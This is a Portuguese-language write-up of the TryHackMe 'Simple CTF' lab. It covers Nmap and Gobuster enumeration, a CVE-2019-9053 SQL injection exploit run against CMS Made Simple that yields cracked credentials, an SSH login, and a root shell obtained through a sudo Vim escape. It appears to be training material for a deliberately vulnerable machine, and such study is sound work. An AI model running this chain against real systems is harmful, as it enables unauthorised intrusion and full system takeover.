TryHackMe - Simple CTF#

1.1. Varredura com Nmap#

Após tentativas iniciais com resultados filtrados, utilizei um escaneamento Nmap mais completo para garantir a descoberta dos serviços. Os parâmetros -sC (scripts padrão), -sV (versões) e -Pn (ignorar descoberta de host) foram essenciais.

1
nmap -T4 -sC -sV -Pn -oN nmap/initial 10.201.34.55

Resultado:

1
Nmap scan report for 10.201.34.55
2
Host is up (0.29s latency).
3
Not shown: 997 filtered tcp ports (no-response)
4
PORT     STATE SERVICE VERSION
5
21/tcp   open  ftp     vsftpd 3.0.3
6
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
7
|_Can't get directory listing: TIMEOUT
8
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
9
|_http-title: Apache2 Ubuntu Default Page: It works
10
|_http-server-header: Apache/2.4.18 (Ubuntu)
11
| http-robots.txt: 2 disallowed entries
12
|_/ /openemr-5_0_1_3
13
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
14
| ssh-hostkey:
15
|   2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA)
16
|_  ...
17
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TIP

Pontos de Interesse Encontrados:

• Porta 21: FTP (vsftpd 3.0.3) com login anônimo habilitado.
• Porta 80: HTTP (Apache httpd 2.4.18).
• Porta 2222: SSH (OpenSSH 7.2p2) - A porta de serviço mais alta.

1.2. Enumeração de Diretórios Web#

Para explorar o servidor web, usei o GoBuster para encontrar diretórios ocultos.

1
gobuster dir -u http://10.201.34.55 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

O resultado mais relevante foi o diretório /simple.

2.1. Identificação da Vulnerabilidade#

Ao acessar http://10.201.34.55/simple, o rodapé da página revelou a tecnologia e a versão em uso: CMS Made Simple version 2.2.8.

Uma rápida pesquisa por essa versão levou à descoberta de uma vulnerabilidade de SQL Injection não autenticada, registrada como CVE-2019-9053.

2.2. Execução do Exploit#

Encontrei um script de exploração funcional no GitHub. O script permite extrair o hash da senha do administrador e, em seguida, quebrá-lo usando uma wordlist.

1
python3 exploit.py -u http://10.201.34.55/simple --crack -w /usr/share/wordlists/rockyou.txt

Resultado do Exploit:

1
[+] Username found: mitch
2
[+] Email found: admin@admin.com
3
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
4
[+] Password cracked: secret

As credenciais obtidas foram mitch:secret.

3.1. Conexão SSH#

1
ssh mitch@10.201.34.55 -p 2222

3.2. Capturando a Flag do Usuário#

Após o login, a flag do usuário estava no diretório home.

1
$ ls
2
user.txt
3
$ cat user.txt

IMPORTANT

user.txt: ...user_flag...

3.3. Enumeração de Usuários#

Verifiquei o diretório /home e encontrei outro usuário na máquina.

1
$ pwd
2
/home/mitch
3
$ cd ..
4
$ ls
5
mitch  sunbath

O outro usuário é o sunbath.

4.1. Identificando o Vetor#

O comando sudo -l revela o que um usuário pode executar como superusuário.

1
$ sudo -l

WARNING

Vetor Encontrado: O usuário mitch pode executar o editor de texto Vim como root e sem precisar de senha (NOPASSWD).

4.2. Obtendo um Shell Root#

O Vim pode ser usado para executar comandos do sistema. O site GTFOBins mostra como explorar essa permissão para obter um shell.

Executei o seguinte comando para abrir um shell como root a partir do Vim:

1
$ sudo vim -c ':!/bin/sh'

Isso me deu um shell com privilégios de root.

1
id
2
uid=0(root) gid=0(root) groups=0(root)

4.3. Capturando a Flag Root#

Finalmente, naveguei até o diretório /root para encontrar a última flag.

1
cd /root
2
ls
3
root.txt
4
cat root.txt

IMPORTANT

root.txt: ...root_flag...!